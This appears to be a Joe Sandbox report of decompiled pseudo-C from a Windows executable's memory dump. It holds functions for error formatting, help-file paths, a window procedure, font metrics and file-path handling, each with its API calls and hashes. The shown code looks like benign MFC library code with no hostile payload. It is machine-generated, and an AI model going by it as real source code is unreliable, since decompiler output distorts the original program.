                  				char _v864;
                  				char _v868;
                  				signed int _v872;
                  				char _v876;
                  				char _v892;
                  				signed int _v893;
                  				char _v900;
                  				char _v904;
                  				char _v908;
                  				char _v924;
                  				intOrPtr _v928;
                  				intOrPtr _v932;
                  				intOrPtr _v936;
                  				intOrPtr _v940;
                  				signed int _v944;
                  				signed int _v948;
                  				char _v952;
                  				intOrPtr _v956;
                  				intOrPtr _v960;
                  				intOrPtr _v964;
                  				intOrPtr _v968;
                  				void* __ebp;
                  				signed int _t143;
                  				signed int _t144;
                  				void* _t154;
                  				void* _t166;
                  				signed short _t177;
                  				signed short _t193;
                  				signed int _t195;
                  				intOrPtr _t226;
                  				intOrPtr _t252;
                  				signed int _t293;
                  
                  				_t292 = __esi;
                  				_t291 = __edi;
                  				_t216 = __ebx;
                  				_push(0xffffffff);
                  				_push(E004384DB);
                  				_push( *[fs:0x0]);
                  				_t143 =  *0x44c364; // 0xa6e2bca1
                  				_t144 = _t143 ^ _t293;
                  				_v32 = _t144;
                  				_push(_t144);
                  				 *[fs:0x0] =  &_v16;
                  				_v928 = __ecx;
                  				E00404820( &_v20);
                  				_v8 = 0;
                  				E00404E80( &_v864);
                  				_v8 = 1;
                  				E00404820( &_v844);
                  				_v8 = 2;
                  				_v28 = E00403810( *((intOrPtr*)(_v928 + 0x58)));
                  				_v24 = E00401B20(__ebx,  &_v864,  &_v20, __edi, __esi,  &_v20,  &_v864, 0, 0x8c, 0x7c);
                  				_t300 = _v24;
                  				if(_v24 >= 0) {
                  					E0041286F(__ebx,  &_v840, __edi, __esi, __eflags, 0, 0, 0, 6, E0040A540( &_v20), 0, 0, 1);
                  					_v8 = 4;
                  					_t154 = E00411FAB( &_v840);
                  					_t226 = _v928;
                  					_t285 =  *(_t226 + 0x98);
                  					 *(_t154 + 0x18) =  *(_t226 + 0x98);
                  					_v848 = E004130CD( &_v840, __eflags);
                  					__eflags = _v848 - 1;
                  					if(__eflags == 0) {
                  						 *((intOrPtr*)(_v928 + 0x98)) =  *((intOrPtr*)(E00411FAB( &_v840) + 0x18));
                  						_push( &_v852);
                  						E004131FC(__ebx,  &_v840, __edi, __esi, __eflags);
                  						_v8 = 5;
                  						_push( &_v900);
                  						_v940 = E004134AC(__ebx,  &_v840, __edi, __esi, __eflags);
                  						_v893 = E00404E60(_v940);
                  						E00404840( &_v900);
                  						_t285 = _v893 & 0x000000ff;
                  						__eflags = _v893 & 0x000000ff;
                  						if((_v893 & 0x000000ff) != 0) {
                  							_t177 = E00404DE0(_t216,  &_v852, _t291, _t292, E00404E40( &_v852) - 1);
                  							__eflags = (_t177 & 0x0000ffff) - 0x2e;
                  							if((_t177 & 0x0000ffff) == 0x2e) {
                  								__eflags = E00404E40( &_v852) - 1;
                  								_v944 = E00404CA0( &_v852,  &_v904, E00404E40( &_v852) - 1);
                  								_t285 = _v944;
                  								_v948 = _v944;
                  								_v8 = 6;
                  								E00404860( &_v852, _v948);
                  								_v8 = 5;
                  								E00404840( &_v904);
                  							}
                  							E00404820( &_v868);
                  							_v8 = 7;
                  							_t252 = _v928;
                  							__eflags =  *(_t252 + 0x98);
                  							if( *(_t252 + 0x98) != 0) {
                  								_t88 =  *((intOrPtr*)(_v928 + 0x98)) - 1; // -1
                  								_v872 =  *((intOrPtr*)(_v928 + 0x98)) + _t88;
                  								_v876 = 0;
                  								while(1) {
                  									__eflags = _v872;
                  									if(_v872 == 0) {
                  										break;
                  									}
                  									_v952 = _v876;
                  									_v876 = _v876 + 1;
                  									_t193 = E00404DE0(_t216,  &_v20, _t291, _t292, _v952);
                  									__eflags = (_t193 & 0x0000ffff) - 0x7c;
                  									if((_t193 & 0x0000ffff) == 0x7c) {
                  										_t195 = _v872 - 1;
                  										__eflags = _t195;
                  										_v872 = _t195;
                  									}
                  								}
                  								_t285 =  &_v908;
                  								_v956 = E00404A60( &_v20,  &_v908, 0x43a7d8,  &_v876);
                  								_v960 = _v956;
                  								_v8 = 8;
                  								E00404860( &_v868, E00404C20(_v960));
                  								_v8 = 7;
                  								E00404840( &_v908);
                  								E00404880( &_v868, PathFindExtensionW(E0040A540( &_v868)));
                  							} else {
                  								E004048A0( &_v868, ".jpg");
                  							}
                  							E00404980( &_v852,  &_v868);
                  							_v8 = 5;
                  							E00404840( &_v868);
                  						}
                  						__eflags = _v24;
                  						if(__eflags < 0) {
                  							_v964 = E00401610( &_v924, _v24, 0, 0);
                  							_v968 = _v964;
                  							_v8 = 9;
                  							_push(E00401700(_v968));
                  							_t285 =  &_v844;
                  							E00406170( &_v844, 0xaf, _v24);
                  							_v8 = 5;
                  							E004016A0( &_v924);
                  							E00413C2B(_t216, _t291, _t292, __eflags, E0040A540( &_v844), 0, 0);
                  						}
                  						_v8 = 4;
                  						E00404840( &_v852);
                  						_v8 = 2;
                  						E00412711(_t216,  &_v840, _t291, _t292, __eflags);
                  						_v8 = 1;
                  						E00404840( &_v844);
                  						_v8 = 0;
                  						E00406230( &_v864);
                  						_v8 = 0xffffffff;
                  						_t166 = E00404840( &_v20);
                  					} else {
                  						_v8 = 2;
                  						E00412711(__ebx,  &_v840, __edi, __esi, __eflags);
                  						_v8 = 1;
                  						E00404840( &_v844);
                  						_v8 = 0;
                  						E00406230( &_v864);
                  						_v8 = 0xffffffff;
                  						_t166 = E00404840( &_v20);
                  					}
                  				} else {
                  					_v932 = E00401610( &_v892, _v24, 0, 0);
                  					_v936 = _v932;
                  					_v8 = 3;
                  					_push(E00401700(_v936));
                  					_t285 = _v24;
                  					E00406170( &_v844, 0xaa, _v24);
                  					_v8 = 2;
                  					E004016A0( &_v892);
                  					E00413C2B(__ebx, __edi, __esi, _t300, E0040A540( &_v844), 0, 0);
                  					_v8 = 1;
                  					E00404840( &_v844);
                  					_v8 = 0;
                  					E00406230( &_v864);
                  					_v8 = 0xffffffff;
                  					_t166 = E00404840( &_v20);
                  				}
                  				 *[fs:0x0] = _v16;
                  				return E00427DFF(_t166, _t216, _v32 ^ _t293, _t285, _t291, _t292);
                  			}

                  APIs
                  • std::exception::exception.LIBCMTD ref: 00403376
                  • _com_error::_com_error.COMSUPPD ref: 004033D6
                    • Part of subcall function 00401700: FormatMessageW.KERNEL32(00001300,00000000,00AA6852,00000400,004013D1,00000000,00000000,004013DD,00000000,00000000,00000000,?,?,?,000000B0,A6E2BCA1), ref: 00401734
                    • Part of subcall function 00401700: lstrlenW.KERNEL32(00000000,?,?,?,000000B0,A6E2BCA1), ref: 0040174A
                    • Part of subcall function 00406170: _DebugHeapAllocator.LIBCPMTD ref: 004061A1
                    • Part of subcall function 004016A0: GetProcessHeap.KERNEL32(?,00401405,?,00000000,00000000,00000000,?,?,?,000000B0,A6E2BCA1), ref: 004016D8
                    • Part of subcall function 004016A0: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 004016F4
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Heap$AllocatorDebugFormatFreeMessageProcess_com_error::_com_errorlstrlenstd::exception::exception
                  • String ID: .jpg
                  • API String ID: 3950668111-3623929066
                  • Opcode ID: fa0901f801f913cea652976c4d360c2984ee6285b6a79ab8e56e3ed2da686b09
                  • Instruction ID: 5cd3b7c294478c2aa95b472f2e812587f88935d83f9b8159460fa1860baa5cdb
                  • Opcode Fuzzy Hash: fa0901f801f913cea652976c4d360c2984ee6285b6a79ab8e56e3ed2da686b09
                  • Instruction Fuzzy Hash: 20D14A708102589BDB26EB65CC51BEEB778AF55308F1084EEA10A772D1DB782F84CF59
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 61%
                  			E0042764D(void* __ecx, void* __edx, void* __eflags) {
                  				signed int _v8;
                  				short _v528;
                  				char _v1048;
                  				char _v1560;
                  				WCHAR* _v1564;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				signed int _t35;
                  				long _t41;
                  				WCHAR* _t44;
                  				intOrPtr _t61;
                  				intOrPtr _t66;
                  				void* _t69;
                  				void* _t70;
                  				void* _t71;
                  				void* _t78;
                  				void* _t79;
                  				void* _t80;
                  				void* _t82;
                  				void* _t84;
                  				void* _t85;
                  				signed int _t89;
                  				void* _t90;
                  
                  				_t79 = __edx;
                  				_t72 = __ecx;
                  				_t87 = _t89;
                  				_t90 = _t89 - 0x618;
                  				_t35 =  *0x44c364; // 0xa6e2bca1
                  				_v8 = _t35 ^ _t89;
                  				_push(_t69);
                  				_push(_t80);
                  				_t84 = __ecx;
                  				_t70 = E0042083D(_t69, _t80, __ecx, __eflags);
                  				 *(_t70 + 8) =  *(_t84 + 0x44);
                  				 *(_t70 + 0xc) =  *(_t84 + 0x44);
                  				_t41 = GetModuleFileNameW( *(_t84 + 0x44),  &_v528, 0x104);
                  				if(_t41 == 0 || _t41 == 0x104) {
                  					E0041416A(_t72);
                  				}
                  				_t44 = PathFindExtensionW( &_v528);
                  				_v1564 = _t44;
                  				if(_t44 == 0) {
                  					E0041416A(_t72);
                  				}
                  				_t73 = _v1564;
                  				 *_v1564 = 0;
                  				if(E0042760D(_v1564,  &_v528,  &_v1048, 0x104) != 0) {
                  					E0041416A(_t73);
                  				}
                  				if( *((intOrPtr*)(_t84 + 0x60)) == 0) {
                  					_t66 = E0042B22A(_t79,  &_v1048);
                  					_pop(_t73);
                  					 *((intOrPtr*)(_t84 + 0x60)) = _t66;
                  					if(_t66 == 0) {
                  						L10:
                  						E00413D98(_t73);
                  					}
                  				}
                  				_t49 =  *((intOrPtr*)(_t84 + 0x50));
                  				if(_t49 == 0) {
                  					if(E004152FF(_t70, _t73, 0x104, _t84, 0xe000,  &_v1560, 0x100) == 0) {
                  						_push( *((intOrPtr*)(_t84 + 0x60)));
                  					} else {
                  						_push( &_v1560);
                  					}
                  					_t49 = E0042B22A(_t79);
                  					 *((intOrPtr*)(_t84 + 0x50)) = _t49;
                  					_pop(_t73);
                  					if(_t49 == 0) {
                  						goto L10;
                  					}
                  				}
                  				 *((intOrPtr*)(_t70 + 0x10)) = _t49;
                  				if( *((intOrPtr*)(_t84 + 0x64)) == 0) {
                  					_t78 = 0x104 - (_v1564 -  &_v528 >> 1);
                  					if( *((intOrPtr*)(_t84 + 0x6c)) != 1) {
                  						_push(L".HLP");
                  					} else {
                  						_push(L".CHM");
                  					}
                  					_push(_t78);
                  					_push(_v1564);
                  					E00411FBE();
                  					_t90 = _t90 + 0xc;
                  					_t61 = E0042B22A(_t79,  &_v528);
                  					_pop(_t73);
                  					 *((intOrPtr*)(_t84 + 0x64)) = _t61;
                  					if(_t61 == 0) {
                  						goto L10;
                  					} else {
                  						_t73 = _v1564;
                  						_t49 = 0;
                  						 *_v1564 = 0;
                  					}
                  				}
                  				if( *((intOrPtr*)(_t84 + 0x68)) == 0) {
                  					E00402880(_t73, E0042B1AD( &_v1048, 0x104, L".INI"));
                  					_t49 = E0042B22A(_t79,  &_v1048);
                  					_t90 = _t90 + 0x14;
                  					 *((intOrPtr*)(_t84 + 0x68)) = _t49;
                  					if(_t49 == 0) {
                  						goto L10;
                  					}
                  				}
                  				_pop(_t82);
                  				_pop(_t85);
                  				_pop(_t71);
                  				return E00427DFF(_t49, _t71, _v8 ^ _t87, _t79, _t82, _t85);
                  			}

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: __wcsdup$ExtensionFileFindModuleNamePath
                  • String ID: .CHM$.HLP$.INI
                  • API String ID: 2477486372-4017452060
                  • Opcode ID: a6e8f7418ca4730a1224ee4ad42bbeeed1c4b5aec68547b78c653d68e54b399f
                  • Instruction ID: 0061e79066eda8a606490fc8e7f00c3e72cb7088ad3a17422050bb6e6b6c3ff4
                  • Opcode Fuzzy Hash: a6e8f7418ca4730a1224ee4ad42bbeeed1c4b5aec68547b78c653d68e54b399f
                  • Instruction Fuzzy Hash: 8941A5716007299BDB20EF75EC45A9B73F8AF84314F4008AFE446D3241EB78E980CB69
                  Uniqueness

                  Uniqueness Score: 7.75%

                  C-Code - Quality: 100%
                  			E00401700(intOrPtr __ecx) {
                  				signed int _v8;
                  				void* _v12;
                  				signed int _v16;
                  				intOrPtr _v20;
                  
                  				_v20 = __ecx;
                  				if( *(_v20 + 0xc) != 0) {
                  					L12:
                  					_t55 = _v20 + 0xc; // 0xfffffc74
                  					return  *_t55;
                  				}
                  				_t6 = _v20 + 4; // 0xaa6852
                  				FormatMessageW(0x1300, 0,  *_t6, 0x400, _v20 + 0xc, 0, 0);
                  				if( *(_v20 + 0xc) == 0) {
                  					_v12 = GetProcessHeap();
                  					if(_v12 != 0) {
                  						 *(_v20 + 0xc) = HeapAlloc(_v12, 0, 0x40);
                  						if( *(_v20 + 0xc) != 0) {
                  							_v16 = E00401830(_v20);
                  							if((_v16 & 0x0000ffff) == 0) {
                  								swprintf( *(_v20 + 0xc), 0x20, L"Unknown error 0x%0lX",  *(_v20 + 4));
                  							} else {
                  								swprintf( *(_v20 + 0xc), 0x20, L"IDispatch error #%d", _v16 & 0x0000ffff);
                  							}
                  						}
                  					}
                  					goto L12;
                  				}
                  				_v8 = lstrlenW( *(_v20 + 0xc));
                  				if(_v8 > 1 && ( *( *(_v20 + 0xc) + _v8 * 2 - 2) & 0x0000ffff) == 0xa) {
                  					 *( *(_v20 + 0xc) + _v8 * 2 - 2) = 0;
                  					if(( *( *(_v20 + 0xc) + _v8 * 2 - 4) & 0x0000ffff) == 0xd) {
                  						 *( *(_v20 + 0xc) + _v8 * 2 - 4) = 0;
                  					}
                  				}
                  				goto L12;
                  			}








                  APIs
                  • FormatMessageW.KERNEL32(00001300,00000000,00AA6852,00000400,004013D1,00000000,00000000,004013DD,00000000,00000000,00000000,?,?,?,000000B0,A6E2BCA1), ref: 00401734
                  • lstrlenW.KERNEL32(00000000,?,?,?,000000B0,A6E2BCA1), ref: 0040174A
                  • GetProcessHeap.KERNEL32(?,?,?,000000B0,A6E2BCA1), ref: 004017A1
                  • HeapAlloc.KERNEL32(00000000,00000000,00000040), ref: 004017B8
                  • HandleT.LIBCPMTD ref: 004017D0
                  • swprintf.LIBCMT ref: 004017F4
                  • swprintf.LIBCMT ref: 00401813
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Heapswprintf$AllocFormatHandleMessageProcesslstrlen
                  • String ID: IDispatch error #%d$Unknown error 0x%0lX
                  • API String ID: 326659730-2934499512
                  • Opcode ID: 3573854379ac9e7aa418a57e4558dfa7487c6769b0321bcdc1bbb0c509564e10
                  • Instruction ID: 422e95fc1a98e91328473f5af0246a68e02e148dda8e12045873940090211fc0
                  • Opcode Fuzzy Hash: 3573854379ac9e7aa418a57e4558dfa7487c6769b0321bcdc1bbb0c509564e10
                  • Instruction Fuzzy Hash: DF413878A00219DBDB04DB94C895A7EF3B5FF48710F24C999E915AB3D1C339A942CB94
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 96%
                  			E0040FE0B(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                  				_Unknown_base(*)()* _t31;
                  				void* _t33;
                  				void* _t34;
                  				void* _t40;
                  				void* _t43;
                  				void* _t61;
                  				void* _t65;
                  				struct HWND__* _t67;
                  				WCHAR* _t69;
                  				void* _t72;
                  
                  				_t65 = __edx;
                  				_t61 = __ecx;
                  				_push(0x40);
                  				E0042925E(E004389D7, __ebx, __edi, __esi);
                  				_t67 =  *(_t72 + 8);
                  				_t69 = L"AfxOldWndProc423";
                  				_t31 = GetPropW(_t67, _t69);
                  				 *(_t72 - 0x14) =  *(_t72 - 0x14) & 0x00000000;
                  				 *(_t72 - 4) =  *(_t72 - 4) & 0x00000000;
                  				 *(_t72 - 0x18) = _t31;
                  				_t59 = 1;
                  				_t33 =  *(_t72 + 0xc) - 6;
                  				if(_t33 == 0) {
                  					_t34 = E0040E20E(1, _t61,  *(_t72 + 0x14));
                  					E0040FD1B(_t61, E0040E20E(1, _t61, _t67),  *(_t72 + 0x10), _t34);
                  					goto L9;
                  				} else {
                  					_t40 = _t33 - 0x1a;
                  					if(_t40 == 0) {
                  						_t59 = 0 | E0040FD93(1, _t67, E0040E20E(1, _t61, _t67),  *(_t72 + 0x14),  *(_t72 + 0x14) >> 0x10) == 0x00000000;
                  						L9:
                  						if(_t59 != 0) {
                  							goto L10;
                  						}
                  					} else {
                  						_t43 = _t40 - 0x62;
                  						if(_t43 == 0) {
                  							SetWindowLongW(_t67, 0xfffffffc,  *(_t72 - 0x18));
                  							RemovePropW(_t67, _t69);
                  							GlobalDeleteAtom(GlobalFindAtomW(_t69) & 0x0000ffff);
                  							goto L10;
                  						} else {
                  							if(_t43 != 0x8e) {
                  								L10:
                  								 *(_t72 - 0x14) = CallWindowProcW( *(_t72 - 0x18), _t67,  *(_t72 + 0xc),  *(_t72 + 0x10),  *(_t72 + 0x14));
                  							} else {
                  								E0040CDB6(E0040E20E(1, _t61, _t67), _t72 - 0x30, _t72 - 0x20);
                  								 *(_t72 - 0x14) = CallWindowProcW( *(_t72 - 0x18), _t67, 0x110,  *(_t72 + 0x10),  *(_t72 + 0x14));
                  								E0040EA3B(1, _t65, _t50, _t72 - 0x30,  *((intOrPtr*)(_t72 - 0x20)));
                  							}
                  						}
                  					}
                  				}
                  				return E00429303( *(_t72 - 0x14));
                  			}














                  APIs
                  • __EH_prolog3_catch.LIBCMT ref: 0040FE12
                  • GetPropW.USER32(?,AfxOldWndProc423), ref: 0040FE21
                  • CallWindowProcW.USER32(?,?,00000110,?,00000000), ref: 0040FE7B
                    • Part of subcall function 0040EA3B: GetWindowRect.USER32(?,10000000), ref: 0040EA65
                  • SetWindowLongW.USER32(?,000000FC,?), ref: 0040FEA2
                  • RemovePropW.USER32(?,AfxOldWndProc423), ref: 0040FEAA
                  • GlobalFindAtomW.KERNEL32(AfxOldWndProc423), ref: 0040FEB1
                  • GlobalDeleteAtom.KERNEL32(?), ref: 0040FEBB
                  • CallWindowProcW.USER32(?,?,?,?,00000000), ref: 0040FF0F
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Window$AtomCallGlobalProcProp$DeleteFindH_prolog3_catchLongRectRemove
                  • String ID: AfxOldWndProc423
                  • API String ID: 2109165785-1060338832
                  • Opcode ID: 8fa050ef522dc57d410b088a1a092b66e2ec1793a0042d5a7cc5433b8911896e
                  • Instruction ID: f8b57021eeb41fe86196d7eab97d6f14bb7bbc6d2762c45cacf8da09e7c0055f
                  • Opcode Fuzzy Hash: 8fa050ef522dc57d410b088a1a092b66e2ec1793a0042d5a7cc5433b8911896e
                  • Instruction Fuzzy Hash: 88316D3140011ABBCF11AFE5DD49DBF3A78AF49311F00453AF941B65E1CB3989259BAA
                  Uniqueness

                  Uniqueness Score: 0.25%

                  C-Code - Quality: 100%
                  			E00418B00(void* __ecx) {
                  				struct HDC__* _v8;
                  				void* _v12;
                  				int _t9;
                  				int _t15;
                  				void* _t20;
                  
                  				_t9 =  *0x44be98; // 0xffffffff
                  				if(_t9 == 0xffffffff) {
                  					_v8 = GetDC(0);
                  					_v12 = 0;
                  					_t20 = CreateFontW(GetSystemMetrics(0x48), 0, 0, 0, 0x190, 0, 0, 0, 2, 0, 0, 0, 0, L"Marlett");
                  					if(_t20 != 0) {
                  						_v12 = SelectObject(_v8, _t20);
                  					}
                  					GetCharWidthW(_v8, 0x36, 0x36, 0x44be98);
                  					if(_t20 != 0) {
                  						SelectObject(_v8, _v12);
                  						DeleteObject(_t20);
                  					}
                  					ReleaseDC(0, _v8);
                  					_t15 =  *0x44be98; // 0xffffffff
                  					return _t15;
                  				}
                  				return _t9;
                  			}









                  APIs
                  • GetDC.USER32(00000000), ref: 00418B1B
                  • GetSystemMetrics.USER32(00000048), ref: 00418B3F
                  • CreateFontW.GDI32(00000000), ref: 00418B46
                  • SelectObject.GDI32(?,00000000), ref: 00418B5C
                  • GetCharWidthW.GDI32(?,00000036,00000036,0044BE98), ref: 00418B6D
                  • SelectObject.GDI32(?,?), ref: 00418B7D
                  • DeleteObject.GDI32(00000000), ref: 00418B80
                  • ReleaseDC.USER32(00000000,?), ref: 00418B8A
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Object$Select$CharCreateDeleteFontMetricsReleaseSystemWidth
                  • String ID: Marlett
                  • API String ID: 1397664628-3688754224
                  • Opcode ID: 6caf2bfb82a8d46b7e7f404735aa05f80573a3b8cedf80b6b3b22035bf1fe089
                  • Instruction ID: 7bf321f048335a127b4d7deff5af8732c8b2c0d0c610d5f16170f5e97c4d2792
                  • Opcode Fuzzy Hash: 6caf2bfb82a8d46b7e7f404735aa05f80573a3b8cedf80b6b3b22035bf1fe089
                  • Instruction Fuzzy Hash: D2118E71981224BFCB215FA29C4DDCFBE3CEF567A1F200025F208A21A0C7B54E50DBA8
                  Uniqueness

                  Uniqueness Score: 1.69%

                  C-Code - Quality: 83%
                  			E00413605(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
                  				void* _t157;
                  				intOrPtr* _t159;
                  				void* _t160;
                  				intOrPtr* _t177;
                  				intOrPtr* _t179;
                  				intOrPtr* _t181;
                  				intOrPtr* _t183;
                  				intOrPtr* _t185;
                  				intOrPtr* _t187;
                  				intOrPtr* _t189;
                  				intOrPtr* _t193;
                  				signed int _t194;
                  				intOrPtr* _t195;
                  				void* _t196;
                  				intOrPtr* _t197;
                  				intOrPtr _t199;
                  				intOrPtr _t200;
                  				intOrPtr _t202;
                  				intOrPtr _t203;
                  				intOrPtr* _t211;
                  				signed int _t212;
                  				signed int _t224;
                  				signed int _t230;
                  				intOrPtr* _t231;
                  				void* _t232;
                  				signed int _t279;
                  				signed int _t280;
                  				signed int _t289;
                  				WCHAR* _t318;
                  				intOrPtr* _t324;
                  				intOrPtr* _t325;
                  				signed int _t326;
                  				void* _t328;
                  				void* _t329;
                  				void* _t330;
                  				void* _t338;
                  
                  				_push(0x28);
                  				_t157 = E0042922B(E00438D02, __ebx, __edi, __esi);
                  				_t328 = __ecx;
                  				_t323 = 1;
                  				if( *((intOrPtr*)(__ecx + 0x78)) != 1) {
                  					L29:
                  					return E00429303(_t157);
                  				}
                  				_t159 =  *((intOrPtr*)(__ecx + 0x80));
                  				_t160 =  *((intOrPtr*)( *_t159 + 0x50))(_t159, _t329 - 0x28);
                  				_t245 = 0;
                  				if(_t160 < 0) {
                  					__eflags =  *( *((intOrPtr*)(__ecx + 0x74)) + 0x34) & 0x00000200;
                  					if(__eflags == 0) {
                  						L28:
                  						_push(_t329 - 0x24);
                  						_t324 = E004131FC(_t245, _t328, _t323, _t328, _t338);
                  						_push(_t329 - 0x2c);
                  						 *(_t329 - 4) = 2;
                  						 *((short*)( *((intOrPtr*)(_t328 + 0x74)) + 0x38)) =  *((intOrPtr*)( *_t324 - 0xc)) -  *((intOrPtr*)( *((intOrPtr*)(E004133B9(_t245, _t328, _t324, _t328, _t338))) - 0xc));
                  						E004055F0( *((intOrPtr*)(_t329 - 0x2c)) + 0xfffffff0);
                  						 *(_t329 - 4) =  *(_t329 - 4) | 0xffffffff;
                  						E004055F0( *((intOrPtr*)(_t329 - 0x24)) + 0xfffffff0);
                  						_push(_t329 - 0x34);
                  						_t325 = E004131FC(_t245, _t328, _t324, _t328, _t338);
                  						_push(_t329 - 0x30);
                  						 *(_t329 - 4) = 3;
                  						 *((short*)( *((intOrPtr*)(_t328 + 0x74)) + 0x3a)) =  *((intOrPtr*)( *_t325 - 0xc)) -  *((intOrPtr*)( *((intOrPtr*)(E004134AC(_t245, _t328, _t325, _t328, _t338))) - 0xc));
                  						E004055F0( *((intOrPtr*)(_t329 - 0x30)) + 0xfffffff0);
                  						_t157 = E004055F0( *((intOrPtr*)(_t329 - 0x34)) + 0xfffffff0);
                  						goto L29;
                  					}
                  					_t177 =  *((intOrPtr*)(__ecx + 0x80));
                  					 *((intOrPtr*)(_t329 - 0x24)) = 0;
                  					__eflags =  *((intOrPtr*)( *_t177))(_t177, 0x43e198, _t329 - 0x24);
                  					if(__eflags < 0) {
                  						goto L28;
                  					}
                  					_t179 =  *((intOrPtr*)(_t329 - 0x24));
                  					 *((intOrPtr*)(_t329 - 0x20)) = 0;
                  					__eflags =  *((intOrPtr*)( *_t179 + 0x6c))(_t179, _t329 - 0x20);
                  					if(__eflags < 0) {
                  						L26:
                  						_t181 =  *((intOrPtr*)(_t329 - 0x24));
                  						L27:
                  						 *((intOrPtr*)( *_t181 + 8))(_t181);
                  						goto L28;
                  					}
                  					_t183 =  *((intOrPtr*)(_t329 - 0x20));
                  					__eflags =  *((intOrPtr*)( *_t183 + 0x24))(_t183, _t329 - 0x1c);
                  					if(__eflags < 0) {
                  						L25:
                  						_t185 =  *((intOrPtr*)(_t329 - 0x20));
                  						 *((intOrPtr*)( *_t185 + 8))(_t185);
                  						goto L26;
                  					}
                  					_t187 =  *((intOrPtr*)(_t329 - 0x1c));
                  					 *((intOrPtr*)(_t329 - 0x2c)) = 0;
                  					__eflags =  *((intOrPtr*)( *_t187 + 0xc))(_t187, 1, _t329 - 0x18, _t329 - 0x2c);
                  					if(__eflags != 0) {
                  						L24:
                  						_t189 =  *((intOrPtr*)(_t329 - 0x1c));
                  						 *((intOrPtr*)( *_t189 + 8))(_t189);
                  						goto L25;
                  					}
                  					E00404820(_t329 - 0x14);
                  					_t313 = _t329 - 0x10;
                  					 *(_t329 - 4) = 1;
                  					_t323 =  *((intOrPtr*)( *((intOrPtr*)(_t328 + 0x74)) + 0x1c));
                  					_t193 =  *((intOrPtr*)(_t329 - 0x18));
                  					 *(_t329 - 0x10) = 0;
                  					_t194 =  *((intOrPtr*)( *_t193 + 0x14))(_t193, 0x80058000, _t329 - 0x10);
                  					__eflags = _t194;
                  					if(_t194 >= 0) {
                  						PathRemoveFileSpecW( *(_t329 - 0x10));
                  						__eflags =  *( *((intOrPtr*)(_t328 + 0x74)) + 0x20) - 1;
                  						E0042AAF2(_t313, _t323,  *( *((intOrPtr*)(_t328 + 0x74)) + 0x20) - 1,  *(_t329 - 0x10), 0xffffffff);
                  						_t230 = E00429211( *(_t329 - 0x10));
                  						_t330 = _t330 + 0x14;
                  						_t323 = _t323 + 2 + _t230 * 2;
                  						__imp__CoTaskMemFree( *(_t329 - 0x10));
                  					}
                  					while(1) {
                  						_t195 =  *((intOrPtr*)(_t329 - 0x18));
                  						 *(_t329 - 0x10) = _t245;
                  						_t196 =  *((intOrPtr*)( *_t195 + 0x14))(_t195, 0x80058000, _t329 - 0x10);
                  						__eflags = _t196 - _t245;
                  						if(_t196 >= _t245) {
                  							E00405C40(_t329 - 0x14,  *(_t329 - 0x10));
                  							PathRemoveFileSpecW(E00412509(_t329 - 0x14));
                  							E0040E100(_t245, _t329 - 0x14, _t323, 0xffffffff);
                  							_t289 =  *( *((intOrPtr*)(_t329 - 0x14)) - 0xc);
                  							_t318 =  *(_t329 - 0x10);
                  							__eflags = _t318[_t289] - 0x5c;
                  							if(_t318[_t289] == 0x5c) {
